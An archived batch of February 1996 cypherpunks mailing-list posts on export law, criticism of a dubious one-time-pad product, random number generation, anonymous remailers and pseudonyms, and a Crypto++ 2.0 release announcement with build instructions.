A more precise answer is "If you print it out, and ask them for permission,
they may or may not grant it.  If you print it out, don't ask for permission,
and let them know you're exporting it, they may or may not decide to
prosecute you, and you may or may not have the resources to win if they do."

Dan Bernstein's reading of the law is that you can't even teach cryptomathics
to foreigners in the US, and his court case on the matter is beginning.
Other people read the law to say that public domain material is not
"technical documentation" on defense items, and thus exempt.
Putting a copy of the MIT book in some public libraries would be nice...

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281

! Frank Zappa for President !





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Tue, 20 Feb 1996 16:52:20 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960219132531.301A-100000@citrine.cyberstation.net>
Message-ID: <199602200812.DAA05762@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


IPG Sales writes:
> Obviously you want to criticise without investigation. He who knows all, 
>    knows little, or nothing accoring to Einstein.

That's a rather disingenuous statement. I read your press release, and then
I spent a while browsing through everything that seemed germane on your
web pages. But my investigation of all the material you had presented to the
world yielded very little in the way of hard facts about the security of the 
IPG system. I responded to what I'd been able to find.

Future technical investigations of IPG would be greatly aided if you placed
on your web pages some of the technical details you have at last revealed
here. I just checked your web pages again, and they still don't explain the
actual workings of the system at all.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Tue, 20 Feb 1996 17:31:31 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960219132531.301A-100000@citrine.cyberstation.net>
Message-ID: <199602200851.DAA02057@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
# Gee, why are we all so worried about key management ?  It's just a load and
# go installation at each of the user sites !  ;)

("That was sarcasm, son")

IPG Sales writes:
> That is precisely why PCX Nvelopes is such an extraordinary system. 
> That is the beauty of PCX Nvelopes, it lifts that  burden from the 
> user, eliminates it entirely. You may have worried about key 
> management, but with our system, you will not have to do so in the 
> future. The system itself, manages all the OTPs, you do not have to do 
> anything but use the system. Key management is the problem with all existing 
> systems, but it is no problem at all with the PCX Nvelopes system, 

What protects each user's one time pads ("PCX Nvelopes", or whatever) ?  

Are they protected by an eight-character Unix account password ?  (This would 
be harder for implementations on traditionally single-user platforms like the
Macintosh and most of the Microsoft OSes, presumably.) 

Are they protected by a policy that says all users must lock away their IPG
disks or CDs when not in use ?  

Also, how are they protected from the people who generate the one-time pads
at IPG (and their friends and families) ? 

> as you 
> would see if you looked at the system, instead, of talking about something 
> when you have no idea at all of what it is about. 

As I said earlier, I read all your material and still had almost no idea
at all about what it is. If you don't tell people about the system, it's
extremely hard for them to do more than speculate.

> The first set of keys 
> must be sent by a secure source, US mail, FED EX, or whatever, but
> thereafter, all updates can be accomodated over Internet. 

Keys ?  Wait a minute, #2 of the "Dozen Reasons why PCX Nvelopes is
absolutely the finest Communication Security and Privacy system available",
according to http://www.netprivacy.com/ipg/dozbest.html, is:

"2. No Messy, Intrusive Passwords/Encryption Keys to get in your way and
worry about, forget about those troublemakers"

[...]
> all hardware generation of OTP's are irregular, otherwise they are not 
> random. 

I'm not sure what you mean by "irregular" in this context.

> Thus at times, a hardware source, such as ADC LOB system, can generate 
> nonrandom data, unless this is checked, it can destroyed the integrity of 
> your system. 

This doesn't quite jibe with my understanding of the typical use of a hardware
RNG. From what I have read, one starts with an unpredictable bit source with
some known bias, so that each original bit has somewhat less than one bit of
real entropy. The bias is "corrected" by combining the original bits to get
fewer bits with enough real entropy, and then repeating the process enough to
get enough final bits of real entropy. 

Could you explain what the acronyms "ADC" and "LOB" mean here ?  I
just tried a web search for the two together, and all I got was a page of
UFO acronyms, and some astronomical acronyms (LOB = Lick Observatory 
Bulletin). Schneier discusses hardware RNG at length in Applied Cryptography,
but he doesn't mention either acronym. I might guess that LOB = Low Order
Bits.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@ncrhub4.attgis.com>
Date: Tue, 20 Feb 1996 17:45:59 +0800
To: cypherpunks@toad.com
Subject: Returned mail: Host unknown (Name server: ncr-sd.sdca.attgis.com.: host not found)
Message-ID: <199602200914.EAA02287@ncrhub5.attgis.com>
MIME-Version: 1.0
Content-Type: text/plain


The original message was received at Tue, 20 Feb 1996 03:58:01 -0500 (EST)
from ncrgw1@localhost

   ----- The following addresses have delivery notifications -----
sandiegoca.ncr.com!chris.claborne  (unrecoverable error)

   ----- Transcript of session follows -----
550 sandiegoca.ncr.com!chris.claborne... Host unknown (Name server: ncr-sd.sdca.attgis.com.: host not found)

   ----- Message header follows -----

Return-Path: cypherpunks@toad.com
Received: from ncrgw1.UUCP (ncrgw1@localhost) by ncrhub5.attgis.com (8.7.3/8.7.3) with UUCP id DAA01682 for sandiegoca.ncr.com!chris.claborne; Tue, 20 Feb 1996 03:58:01 -0500 (EST)
Received: by ncrgw1.ATTGIS.COM; 20 Feb 96 03:57:37 EST
Received: from toad.com by relay3.UU.NET with SMTP 
	id QQadsc06898; Tue, 20 Feb 1996 03:36:36 -0500 (EST)
Received: by toad.com id AA24807; Tue, 20 Feb 96 00:12:26 PST
Received: from cs.umass.edu (freya.cs.umass.edu) by toad.com id AA24801; Tue, 20 Feb 96 00:12:23 PST
Received: from thor.cs.umass.edu by cs.umass.edu (5.65/Ultrix3.0-C)
	id AA21656; Tue, 20 Feb 1996 03:12:18 -0500
Received: (from lmccarth@localhost) by thor.cs.umass.edu (8.6.12/8.6.9) id DAA05762; Tue, 20 Feb 1996 03:12:18 -0500
From: lmccarth@cs.umass.edu
Message-Id: <199602200812.DAA05762@thor.cs.umass.edu>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Date: Tue, 20 Feb 1996 03:12:17 -0500 (EST)
Cc: ipgsales@cyberstation.net (IPG Sales)
Reply-To: cypherpunks@toad.com (Cypherpunks Mailing List)
In-Reply-To: <Pine.BSD/.3.91.960219132531.301A-100000@citrine.cyberstation.net> from "IPG Sales" at Feb 19, 96 02:51:58 pm
X-Mailer: ELM [version 2.4 PL25]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-cypherpunks@toad.com
Precedence: bulk

   ----- Message body suppressed -----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Tue, 20 Feb 1996 18:02:18 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Remailers not heard from; info?
In-Reply-To: <2.2.32.19960219191757.006d763c@mail.aracnet.com>
Message-ID: <199602200943.EAA06099@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Baugh writes:
> And as long as I'm asking questions :-), I see that some remailers
> (hfinney@shell.portal.com, hal@alumni.caltech.edu, homer@rahul.net) preserve
> subject lines while others do not. Is this a readily settable option? If so,
> I'd like to commend it to other remailer operators. If not, I'd be
> interested in getting some sense of how difficult a hack it is.

(Raph has authoritatively covered the space of deployed options already.)

Writing code to keep or drop particular headers is trivial. Getting everyone
who runs a remailer to deploy that code tends to be much harder.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@dawn9.CS.Berkeley.EDU (David A Wagner)
Date: Tue, 20 Feb 1996 18:44:22 +0800
To: cypherpunks@toad.com
Subject: Re: True random numbers
Message-ID: <199602201017.FAA06008@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9602191812.AA07312@toad.com>,  <eli+@GS160.SP.CS.CMU.EDU> wrote:
> Persi Diaconis gave a talk here last week on pseudorandom generation,
> during which he was asked by people didn't use hardware RNGs.  He said
> that he wasn't aware of any that passed the standard battery of
> statistical tests.

Well, he's just being silly then.

Throw the true random numbers into a hash function, and voila! they
pass all the standard battery of tests.

The hard part, IMHO, is figuring out how much true entropy you've got.
(Estimate, but be very conservative!  Mistakes are costly.)
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSmfoioZzwIn1bdtAQHn3wF9E/jnTYZAgUM/Xkd9XCn2kfI1kJw6I1j8
PUkrLrMoy8hL5HVLHOxemVgQAyQQqnSD
=OheY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@vishnu.alias.net>
Date: Tue, 20 Feb 1996 21:08:53 +0800
To: cypherpunks@toad.com
Subject: Re: should we use same nym on multiple servers?
In-Reply-To: <199602200645.HAA00901@utopia.hacktic.nl>
Message-ID: <199602201238.GAA18210@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Anonymous" == Anonymous  <nobody@REPLAY.COM> writes:


    Anonymous> harder to keep our real ID secret.  (E.g., an
    Anonymous> oversimplified scenario would be if an attacker sends a
    Anonymous> message to all three nyms, then watches three PGP
    Anonymous> conventionally encrypted messages arrive in our
    Anonymous> mailbox.)

	What's wrong with having a nym point to yet another nym on a
different server? Has anyone thought of that?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@vishnu.alias.net>
Date: Tue, 20 Feb 1996 21:22:09 +0800
To: cypherpunks@toad.com
Subject: Re: should we use same nym on multiple servers?
In-Reply-To: <199602201238.GAA18210@vishnu.alias.net>
Message-ID: <199602201258.GAA18533@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "John" == John Perry <perry@vishnu.alias.net> writes:


>>>>> "Anonymous" == Anonymous  <nobody@REPLAY.COM> writes:

    John> 	What's wrong with having a nym point to yet another
    John> nym on a different server? Has anyone thought of that?

Ha. Blew that nym.. :) Oh well, that'll teach me to have coffee before
email instead of the other way around.. :)

 John Perry - KG5RG - perry@vishnu.alias.net -  PGP-encrypted e-mail welcome!
 WWW - http://www.alias.net
 PGP 2.62 key for perry@vishnu.alias.net is on the keyservers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Wed, 21 Feb 1996 16:35:34 +0800
To: mab@crypto.com (Matt Blaze)
Subject: Re: DES_ono
In-Reply-To: <199602171829.NAA02360@crypto.com>
Message-ID: <199602201334.HAA05569@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze writes:

>> So the banker's finally figured out what the NSA told us 14 years ago?
>> Great.

>Actually, that article concludes that they *haven't* figured it out yet.

Great, now I will sleep better. :-(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 20 Feb 1996 16:01:58 +0800
To: cypherpunks@toad.com
Subject: should we use same nym on multiple servers?
Message-ID: <199602200645.HAA00901@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


  With the additional nym servers coming on the scene comes the 
question of whether or not to "claim" our alpha.c2 nym on the other 
ones, too.  E.g., if we are foobar@alpha.c2.org, should we also become 
foobar@nym.gondolin.org and foobar@nym.alias.net, too?

  That would let us have a very stable nym, and prevent confusion over 
who's "who" if someone else were to have the same id with another nym 
server.  But, it makes it harder to keep our real ID secret.  (E.g., 
an oversimplified scenario would be if an attacker sends a message to 
all three nyms, then watches three PGP conventionally encrypted 
messages arrive in our mailbox.)

  A "safer" way would be to have the other two nyms have a fake 
address, but then we couldn't receive mail with it.  A trickier way 
would be to have the reply block point to alt.anonymous, but then we'd 
have to constantly be watching for a message "to" us.

  Another angle, though, is that the nym servers may be unstable, and 
multiple nyms would allow us to post, if out "favorite" is down.

  Anyways, I'm a beginner, and think that the most useful use of 
remailers is to ask dumb questions.  :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 21 Feb 1996 01:16:10 +0800
To: cypherpunks@toad.com
Subject: Re: Optical repeaters
Message-ID: <199602201608.IAA17321@shell1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:35 PM 2/19/96 -0800, Timothy C. May wrote:
>By analogy, it is not clear to me that a simple regeneration mechanism,
>with no local observer or recording apparatus, will collapse the wave
>function. Seems to me an experiment may have already been done along these
>lines: separate fibers producing an interference pattern and then these
>inline amps added...if the interference pattern remains, as I would expect,
>then the amps/regenerators did not constitute a "measurement" in QM terms.

An amplification mechanism will usually couple the signal to the vacuum, 
and introduce vacuum noise.   Another way of thinking of vacuum noise 
is that amplification mixes the state of the signal, with the (unknown) 
phase of the universe at infinity.

Of course any statement in words about quantum mechanics is necessarily 
false, so the above statement is a metaphor or parable, rather than literal
truth.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Wed, 21 Feb 1996 01:42:18 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602201618.IAA09595@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


There are remarkable similarities between this 'system' and the Elementrix
one.  Could it be that E-ix is selling some licenses to the unsuspecting?
Or perhaps it's the other way around.

Both involve:

- An ill-defined cure-all solution which can't realy be revealed because of
patent-pending status

- An OTP (so they say) that's not really an OTP

- Starting with a 'seed' that is truly random and then algorithmically
generating a stream that is XOR-ed with the data, based on analogies to
"rotors" and "dice"

- Encrypting keystream data using portions of the previous keystream

** fairly remarkable coincidences.  Or is it that great minds think alike?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Wed, 21 Feb 1996 22:40:32 +0800
To: "cypherpunks@toad.com>
Subject: RE: Internet Privacy Guaranteed
Message-ID: <01BAFF6F.3016C000@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


>Err... okay, maybe I don't have this figured out.  Still sounds like OTPs,
>and someone selling random data at $15 a pop per month.  Having multiple
>floppies mailed to me monthly, with all the inherent difficulties, sounds
>like a lot more work than public-key management.  My bozometer is pegged.

It gets even worse by my reading of this thread.  They send out the first lot
of pseudo-OTP via some *nominally* secure channel, but then the send you
the subsequent months via the Internet.  (Presumably encrypted with one of
your existing keys.)

This adds up to a system that isn't event a pseudo-OPT.  It's just a conventional
rotor-based cryptosystem, with an unevaluated implementation.  Break one message
containing a batch of new keys and the entire system is defeated forever.

-Blake





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 21 Feb 1996 02:51:39 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602200851.DAA02057@thor.cs.umass.edu>
Message-ID: <N4fKx8m9L87N085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199602200851.DAA02057@thor.cs.umass.edu>,
lmccarth@cs.umass.edu wrote:

> IPG Sales writes:

> > Thus at times, a hardware source, such as ADC LOB system, can generate 
> > nonrandom data, unless this is checked, it can destroyed the integrity of 
> > your system. 
> 

> Could you explain what the acronyms "ADC" and "LOB" mean here ?  I
> just tried a web search for the two together, and all I got was a page of
> UFO acronyms, and some astronomical acronyms (LOB = Lick Observatory 
> Bulletin). Schneier discusses hardware RNG at length in Applied Cryptography,
> but he doesn't mention either acronym. I might guess that LOB = Low Order
> Bits.

I'd say that you're right, and I'd also guess myself that ADC stands for
Analog-to-Digital Converter, so that an "ADC LOB system" is a hardware
random number generator that looks at the lowest order (and therefore
presumed noisy) bit of an analog-to-digital converter.

ObCrypto:  Would four years experience interpreting cryptic vanity
plates while commuting on the Nimitz Freeway be a good qualification for
an NSA cryptanalyst?  Would that experience also qualify me as a traffic
analyst? 

- -- 
   Alan Bostick             | "If I am to be held in contempt of court,
Seeking opportunity to      | your honor, it can only be because the court
develop multimedia content. | has acted contemptibly!"
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMSn/a+VevBgtmhnpAQG14QMAmzKee6JNV+R5so+xsGN/bPtzmIdAUqES
KB3CJaIEWvKD6PWUQ7/L+j+f8Ugr9ZrXHOscjjIge1zLdwtMnRmzNO/vpO6kI/aq
loVXVhPvPwnlniO6FGF5QqddQ7fUn5gI
=kfQZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 21 Feb 1996 02:51:07 +0800
To: cypherpunks@toad.com
Subject: Re: JavaScript to grab email
Message-ID: <199602201758.JAA21544@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:33 PM 2/20/96 +0200, Jyri Kaljundi wrote:
>Another annoying feature in JavaScript and Netscape. Have a look at 
><http://www.popco.com/grabtest.html>
>
>The page uses JavaScript to steal your e-mail address and sends a test 
>e-mail message to the address it grabbed. It works with Netscape, which 
>is probably only browser supporting JavaScript.
>
>Probably there will soon be thousands of pages which include this code, 
>and people using Netscape 2.0 will be spammed with commercial messages. 
>So just put some false e-mail address in your Netscape browser to disable 
>this feature.
>...

Anyone know the email address of an email reflector that automatically
sends everything sent (not bounced) to it back to the sender.  Or I suppose
I could use invalid names/domain names.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <ptrei@acm.org>
Date: Wed, 21 Feb 1996 00:07:37 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <9602201519.AA02219@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


ipgsales@cyberstation.net writes

[...]
 - I do not now what KDC's are...
[...]
> Incidentally crypto wheel systems are still employed in 1996 at some of
> the highest levels of usage - some called then rotors at one time - they
> are still used because the produce non repeatable sequeces 

It's sort of amazing that a person can show themselves so foolish and ignorant
in less than four full lines of text. No person or organization who has studied 
crypto beyond  the Captain Midnight Decoder Ring level can take these  people 
or  their product seriously.

Peter Trei
ptrei@acm.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 21 Feb 1996 08:45:55 +0800
To: cypherpunks@toad.com
Subject: Re: Optical repeaters
Message-ID: <m0toxMH-00090qC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:04 AM 2/20/96 -0800, jamesd@echeque.com wrote:
>At 07:35 PM 2/19/96 -0800, Timothy C. May wrote:
>>By analogy, it is not clear to me that a simple regeneration mechanism,
>>with no local observer or recording apparatus, will collapse the wave
>>function. Seems to me an experiment may have already been done along these
>>lines: separate fibers producing an interference pattern and then these
>>inline amps added...if the interference pattern remains, as I would expect,
>>then the amps/regenerators did not constitute a "measurement" in QM terms.
>
>An amplification mechanism will usually couple the signal to the vacuum, 
>and introduce vacuum noise.   Another way of thinking of vacuum noise 
>is that amplification mixes the state of the signal, with the (unknown) 
>phase of the universe at infinity.

I would think that the action of a optical fiber amplifier is, in a sense, 
"negative loss," or the inverse of the kind of loss normally found in a 
fiber cable.  Thus, if quantum crypto can be done through a long fiber at 
all, the fiber amplifier shouldn't negatively affect it.  However, if 
polarization is important (and I know that "polarization maintaining" fibers 
are available) then I assume that the amplifier would probably also have to be 
designed to ensure that polarization would also be maintained through the 
EDFA (Erbium-Doped Fiber Amplifier.)

Jim Bell
jimbell@pacifier.com
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSoOwfqHVDBboB2dAQGyawP/TZDei/hk1S3ohFGCz+z8hlLbYuL5Bswo
17UYtM/NyCdKtZ3K/4t2wuGjKwhzUY8iuzi9b1DiKG5pqlsi4rIMz6VqF5V3dIie
5MjDmlCVabYJR5a5DKbWGb/osVsKJfEDskhMcGKtnjMQc3L/Ua9DzkhXhfQ2GWUh
u+4hhjL+i5E=
=f/Cm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 21 Feb 1996 14:04:50 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCE: Crypto++ 2.0
Message-ID: <Pine.SUN.3.91.960220110623.16185A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Crypto++ 2.0 has just been released.  Please see the attached readme file 
for a description of Crypto++ and what's new in version 2.0.  More 
details and download instructions can be found on my homepage at 
http://www.eskimo.com/~weidai.

Wei Dai



Crypto++: a C++ Class Library of Cryptographic Primitives
Version 2.0   2/19/1996

This library includes:

MD5, MD5-MAC, SHA, HAVAL, DES, IDEA, WAKE, 3-WAY, TEA, SAFER,
Blowfish, Diamond2, Diamond2 Lite, Sapphire, Luby-Rackoff, MDC, 
various modes (CFB, CBC, OFB, counter), DH,  DSA, ElGamal, LUC, 
Rabin, BlumGoldwasser, elliptic curve cryptosystems, BBS, gzip 
compression, Shamir's secret sharing scheme, Rabin's information 
dispersal scheme, and zero-knowledge prover and verifier for
graph isomorphism.  There are also various miscellanous modules such 
as base 64 coding and 32-bit CRC.

RSA and RC5 are noticeably absent.  I am still talking to RSA
DSI about adding them back into Crypto++.  I hope version 2.1
will include them.

Crypto++ has been compiled and tested with Borland C++ 4.5, MSVC 4.0, 
and G++ 2.7.2 on MS-DOS, Windows NT, and a variety of Unix machines.
You are welcome to use it for any purpose without paying me, but see
license.txt for the fine print.

           
Some short instructions to compile this library:
(you probably need to modify this to suit your environment)


-- if want to use this library with RSAREF, then

1. get a copy of RSAREF

2. untar or unzip it into a directory below this one

3. type "gcc -c -I. *.c" (in the rsaref/source directory) to compile RSAREF

4. edit config.h (make sure to #define USE_RSAREF)

5. type "g++ -c -Irsaref/source -I. *.cpp" to compile this library

6. type "g++ *.o rsaref/source/*.o -lstdc++ -lm" to link the test driver

7. type "a.out" to run the test driver


-- if you DON'T want to use this library with RSAREF, then

1. edit config.h

2. type "g++ -c *.cpp" to compile this library

3. type "g++ *.o -lstdc++ -lm" to link the test driver

4. type "a.out" to run the test driver


Finally, a note on object ownership:  If a constructor for A takes 
a pointer to an object B (except primitive types such as int and char),
then A owns B and will delete B at A's destruction.  If a constructor 
for A takes a reference to an object B, then the caller retains ownership 
of B and should not destroy it until A no longer needs it.

Good luck, and feel free to e-mail me at weidai@eskimo.com if you have
any problems.  Also, check http://www.eskimo.com/~weidai/cryptlib.html
for updates and new versions.

Wei Dai

History

1.0 - First public release.  Withdrawn at the request of RSA DSI.
    - Has a big bug in the RSA key generation code.

1.1 - Removed RSA, RC4, RC5
    - Disabled calls to RSAREF's non-public functions
    - Minor bugs fixed

2.0 - a completely new, faster multiprecision integer class
    - added MD5-MAC, HAVAL, 3-WAY, TEA, SAFER, LUC, Rabin, BlumGoldwasser,
      Elliptic Curve algorithms
    - added the Lucas strong probable primality test
    - ElGamal encryption and signature schemes modified to avoid weaknesses
    - Diamond changed to Diamond2 because of key schedule weakness
    - fixed bug in WAKE key setup
    - SHS class renamed to SHA
    - lots of miscellaneous optimizations





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 21 Feb 1996 01:54:43 +0800
To: cypherpunks@toad.com
Subject: SOW_hat
Message-ID: <199602201637.LAA24576@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-20-96. FT:

   "Cash versus cashless."

      Assays Y/Ns of e-cash and declares DigiCash the winner
      for its privacy and anonymity. Echoes DC privacy mantra
      and sketches DC/DC tests underway by the EU. Compares
      froth of issuers, fear of banks and so-what of 
      consumers: "Physical cash already offers consumers a 
      product that is universally accepted, convenient, 
      anonymous and has no direct costs."

   2-20-96. WSJ:

   "Security Sytem On the Internet Contains Flaw."

      Two Purdue University students discovered a major flaw
      in Kerberos that could allow a hacker to penetrate
      corporate networks in about 5.8 seconds, giving another
      black-eye to electronic commerce. 

   SOW_hat












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: crisper <crisper@ascensionet.com>
Date: Wed, 21 Feb 1996 02:07:05 +0800
To: cypherpunks@toad.com
Subject: CRYPTO INFO
Message-ID: <3129FD2E.3B33@ascensionet.com>
MIME-Version: 1.0
Content-Type: text/plain


I am fairly new to this crypto group and was looking for any good places 
to get some basic information on current cryptography techniques.  
Anyone with som info on this topic please E-MAIL the response dont post 
on the mailing list.  E-mail to crisper@ascensionet.com

IF ANYONE KNOWS OF ANY GOOD PLACES TOGET A GOOD PGP SHELL FOR WINDOWS 
PLEASE ADD THE URL OR FTP SITE.  THANX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 21 Feb 1996 13:58:29 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: DES_ono
In-Reply-To: <JX7HJD18w165w@bwalk.dm.com>
Message-ID: <9602201822.AA00537@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> writes:
>  >       I'd use IDEA or 3DES.  Again, see Schneier.

Dr. Dimitri Vulis <dlv@bwalk.dm.com> responds:
>  Or perhaps GOST 28147-89.

Can you recommend some suitable S-Box configurations that might make GOST as  
secure as we think IDEA or 3DES is?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rose <mrose@stsci.edu>
Date: Wed, 21 Feb 1996 02:47:17 +0800
To: Jyri Kaljundi <jk@digit.ee>
Subject: Re: JavaScript to grab email
In-Reply-To: <Pine.SOL.3.91.960220162211.12740A-100000@jaramillo.digit.ee>
Message-ID: <9602201743.AA09495@MARIAN.SOGS.STSCI.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> On Tue, 20 Feb 1996 16:33:21 +0200 (EET), Jyri Kaljundi <jk@digit.ee> said:

>Probably there will soon be thousands of pages which include this code,
>and people using Netscape 2.0 will be spammed with commercial messages.
>So just put some false e-mail address in your Netscape browser to disable
>this feature.

Changing the email address known to netscape doesn't help.  Your email
address is in the message sent, regardless of what netscape thinks
your identity is.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim_Bostwick@cargill.com
Date: Wed, 21 Feb 1996 04:26:16 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <9602201858.AA23328@merlin.res.cargill.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199602200851.DAA02057@thor.cs.umass.edu>, Lewis mentioned: 

> Could you explain what the acronyms "ADC" and "LOB" mean here ?  I
[and]
> I might guess that LOB = Low Order Bits.

Now, I'm way (WAY) over my head on this forum wrt crypto. However, an idea --

ADC might mean Analog Digital Converter. LOB might mean Low Order Bit 
(singular). So, IPG may just be watching the LOB of an off-the-shelf analog 
input card. Rash speculation, of course. 

However, if true, a Novitiate Crypto Wizard might be prompted to ask: 

"Assuming I use an audio source to drive the ADC, which of the following would
yield higher entropy?:

	* Greatfull Dead 
	* Al Gore speeches
	* The Beatle's White album (at 78, backwards)
	* The hiss after the local AM station shuts down for the night.
"

:-)

-jim

P.S. My name is Jim Bostwick, I hate big SIG files, and my employers opinion
	might actually coincide with my own - but probably not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Wed, 21 Feb 1996 04:23:19 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602200306.WAA11013@toxicwaste.media.mit.edu>
Message-ID: <Pine.BSD/.3.91.960220124002.9829A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


Derek - We accept the gaunlet that Cyperpunks threw down, We will 
provide the complete set of algoritms and free demo systems - we will not be 
asking you to sign a NDA or anything like that, but we do want it to be a 
two way street - if we put our head in your guillotene, to be chopped 
off by the warlord and his minions, then we expect you to perform 
reciprocal actions.

We will be back in a couple of hours or so, to spell out what we have 
in mind.  I do not believe that you will find the terms 
to be onerous or objectionable. 

Thanks for your civility, unlike some of your comrades in arms, very big 
arms, Greatly appreciated!


There has never been an idea advanced, where the orginator was not 
thought of as a crank - Oliver Wendell Holmes Sr., "Over Teacups"





